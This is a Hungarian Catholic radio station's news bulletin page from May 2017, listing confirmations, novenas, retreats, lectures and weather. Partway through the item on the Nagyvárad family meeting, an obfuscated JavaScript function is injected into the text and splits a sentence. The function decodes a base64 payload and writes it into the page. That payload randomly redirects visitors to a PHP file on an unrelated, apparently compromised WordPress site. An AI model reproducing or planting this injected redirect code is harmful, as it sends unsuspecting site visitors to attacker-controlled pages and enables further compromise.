2017. május 22. – Hírek és programajánló

­

H Í R E K   E S T E

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a holnapi nap folyamán Hidegségen tartják az örökös szentségimádási napot. Járuljunk hálával az Oltáriszentségben jelen levő Krisztus elé, megköszönve a megváltás ajándékát, dicsőítve és áldva Őt.

Bérmálás Hargitafürdőn és Gyimesfelsőlokon
Holnap délelőtt tíz órakor a hargitafürdői templomban 8 fiatal részesül a bérmálás szentségében Jakubinyi György püspök kézfeltétele által. A szentmise keretében az egyháztanács eskütételére is sor kerül.
Délután öt órakor a gyimesfelsőloki Szent András plébániatemplomban 169 bérmálkozó részesül a nagykorúság szentségében Jakubinyi György püspök kézfeltétele által.

Szent Antal-nagykilencedek
A csíksomlyói kegytemplomban június 6-ig keddenként reggel nyolc, délelőtt fél tizenegy és este hét órakor lesznek a szentmisék. A reggel nyolc órakor kezdődő szentmise szónoka felváltva a helyi ferencesek és a csíksomlyói plébános. A fél tizenegyes szentmisén Keresztes Zoltán, a gyergyószentmiklósi Szent István Egyházközség plébánosa prédikál. Az este hét órakor kezdődő szentmisén Baróti Csaba székelyszentkirályi plébános mond szentbeszédet. Az esti szentmisébe a rádiónk hullámhosszán keresztül és a csiksomlyo.ro honlapon is bekapcsolódhatnak.
Székelyudvarhelyen a ferences templomban, a szentbeszédek a Hiszekegyről szólnak. A szentmiséket délelőtt tíz órakor a környék papjai végzik. A hetedik alkalom témája: Hiszek az egy, szent, katolikus és apostoli Anyaszentegyházban. A szentmisét és prédikációt Jakab Lajos, vágási plébános tartja.
A kolozsvári ferences templomban a szentmisék délelőtt tíz és délután hat órakor lesznek, öt órától pedig szentségimádás. A tíz órakor kezdődő szentmisék keretében vendégpapok prédikálnak. A szentbeszédek témái az Erények és Szent László évéhez kapcsolódnak.
Nagykilencedet tartanak a szatmárnémeti Szent Antal templomban is. Keddenként, reggel kilenc órától gyónásra nyílik lehetőség, tíz órától pedig szentmisét mutatnak be. Az elmélkedéseket Leabu Marius székesegyházi segédlelkész tartja.
A nagyszebeni ferences templomban a Szent Antal kilenced kedden délután öt órakor kezdődik. Előtte félórával rózsafüzért imádkoznak. A szentbeszédet Puskás Attila segédlelkész tartja.
A szárhegyi ferences templomban a szentmisék rendje a következő: délelőtt tíz órától rózsafüzér, majd fél tizenegytől és délután öt órától szentmise elmélkedéssel. A szentmisék homíliájában arra a kérdésre keresik a választ, hogy hogyan kerülhetünk élő kapcsolatba Istennel. Az elmélkedés témája: „Amikor imádkozom, valóban imádkozom?”
Az esztelneki ferences templomban a szentmisék délután hat órakor kezdődnek.

Egyházmegyei Családtalálkozó Nagyváradon
Május 27-én, szombaton szervezi meg a Nagyváradi Római Katolikus Püspökség a VII. Egyházmegyei Családtalálkozót. A találkozó témája Családbarát plébánia, előadója pedig Szénégető István, a Gyulafehérvári Főegyházmegye családreferense. A találkozót a Böcskei László megyés püspök által a székesegyházban tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó szentmise zárja.

Időjárás: Holnap a napos időszakok mellett számítanunk kell záporok, zivatarok kialakulására is. A légmozgás mérsékelt marad, de zivatarok környezetében lehetnek erős lökések. A legmagasabb hőmérséklet 20 és 26 fok között alakul. 

MRE - Hírszolgálat, 2017. május 22.


H Í R E K   ER E G G E L / D É L B E N

Lezárúlt a Mariathon!
Tegnap este ért véget a Mariathon, melynek során összefogtunk a budapesti Mária Rádióval, hogy testvéreinket, a délvidéki és a felvidéki Mária Rádiók sorsát segítsük. A gyújtés folyamán hallgatóink 14485 lejt ajánlottak fel. Megköszönünk ezúton is minden egyes imát, adományt. Isten fizesse meg bőségesen mindannyiuk jóságát!

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a Gyímesközéplokon tartják az örökös szentségimádási napot. Járuljunk hálával az Oltáriszentségben jelen levő Krisztus elé, megköszönve a megváltás ajándékát.

Bérmálás Csíksomlyón és Csíktaplocán
Ma délelőtt tíz órakor a csíksomlyói Szent Péter- és Pál-plébániatemplomban 87 bérmálkozó részesül a nagykorúság szentségében Jakubinyi György érsek kézfeltétele által. A szentmise keretében megáldják a kívül-belül felújított istenházát.
A csíktaplocai plébániatemplomban délután öt órakor 93 fiatal és 2 felnőtt részesül a bérmálás szentségében Jakubinyi György érsek kézfeltétele által.

Gyászfeldolgozó lelkigyakorlat Kézdivásárhelyen
A kézdivásárhelyi Boldog Özséb plébánián május 22. - július   24. között, heti egy alkalomból álló gyászfeldolgozó lelkigyakorlatot tart Hajlák Attila-István segédlelkész. Az első találkozás ma este hét órakor lesz. Érdeklődni és jelentkezni a 0742 698 166-os telefonszámon lehet.

Kísért imádság hete Kolozsváron
A szociális testvérek május 25. és 31. között hívják és várják a Kísért imádság hetére mindazokat, akik szeretnének megtanulni imádkozni a Szentírással, vagy már tudnak, de mélyebb Isten-kapcsolatra vágynak, akik szeretnének Isten szemével tekinteni életükre és önmagukra, akik szívesen elmennének egy lelkigyakorlatra, de most éppen nincs rá módjuk. A programra Kolozsváron kerül sor. Az együtt ünnepelt kezdő és záró szentmise között a hét folyamán a résztvevőknek naponta egy órát kell szentelniük imádságra, illetve minden nap megoszthatják tapasztalataikat személyes kísérőjükkel. A program iránt érdeklődők számára a testvérek részletes ismertető levelet és jelentkezési lapot küldenek. Jelentkezni még a mai napon lehet Farmati Anna testvérnél a 0740-430666-os telefonszámon, vagy a szocialis.testverek@gmail.com címen. Kísérők: Farmati Anna, Fülöp Magdolna, Homa Ildikó, Imre Edit testvérek.

Előadás Gyergyóalfaluban
A csíksomlyói búcsú története címmel tart előadást Dr. Darvas Kozma József, esperes-plébános május 24-én, szerdán délután hat órától a gyergyóalfalvi római katolikus templomban. Minden érdeklődőt várnak.

Ismerkedjünk Szent László legendájával
Május 25-én, csütörtökön a felsőboldogfalvi és az oroszhegyi diákok a Hargita Megyei Hagyományőrzési Forrásközpont által szervezett tanulmányút és rendhagyó történelemóra keretében ismerkednek Oroszhegy látványosságaival és Szent László legendáival. A tanulmányút során a diákok meglátogatják a Nagyboldogasszony templomot, a turisztikai központot, a középkori kápolnaromot és az Urusos-kútat, majd középkori viselet és táncbemutatón vesznek részt.
A falunak híres búcsújáróhelye volt, a falutól északra elterülő Kápolna mező nevű helyen, amelynek közelében a hagyomány szerint csodás gyógyulások történtek. A gyógyító erejű forrást Urusos-kútnak nevezik, keletkezését az oroszhegyiek Szent László királlyal hozzák kapcsolatba, aki e tájon vonult csapatával és fekélyes katonái gyógyulásáért Istenhez imádkozott, majd beleszúrta kardját a földbe, és ennek nyomán forrás fakadt. Számos gyógyulás, valamint a csodás jelenségek hívták életre még a középkor folyamán azt az „erdei” kápolnát, ahová minden évben áldozócsütörtökön elzarándokolnak az oroszhegyiek és a környék lakói.
A program délelőtt tíz órakor kezdődik Oroszhegy központjában, minden érdeklődőt szeretettel várnak.

Előadás Székelyudvarhelyen
Dr. Csókay András idegsebész főorvos, világhírű agykutató tart előadást Székelyudvarhelyen június 1-jén, a Szent Pio Lelkigyakorlatos Házban. Az este hét órától kezdődő előadás keretében a főorvos beszél arról, hogy hogyan talált rá Istenre, a hit erejéről, Istenbe vetett reményéről, hétköznapi csodákról.

Lelkinap lányoknak Homoródremetén
A mallersdorfi ferences nővérek lelki napokat szerveznek lányoknak június 9-11. között Homoródremetén, ahol a természetben, a közös imában, beszélgetésekben és a csendben próbálnak Isten jelenlétére figyelni, Vele találkozni. Ezekre a napokra 16 és 30 év közötti lányok jelentkezését várják június 3-ig a fifinover@gmail.com e-mail címen vagy a 0752 957 703-as telefonszámon.

Időjárás: Ma a hosszabb-rövidebb napos időszakok mellett délutántól az ország nagy részén előfordulhat egy-egy zápor, zivatar. Helyenként megélénkül, északkeleten és északnyugaton megerősödik a szél. Napközben 20-26 fok közötti értékekre számíthatunk.

MRE - Hírszolgálat, 2017. május 22.

About the author

maradmin

Leave a Comment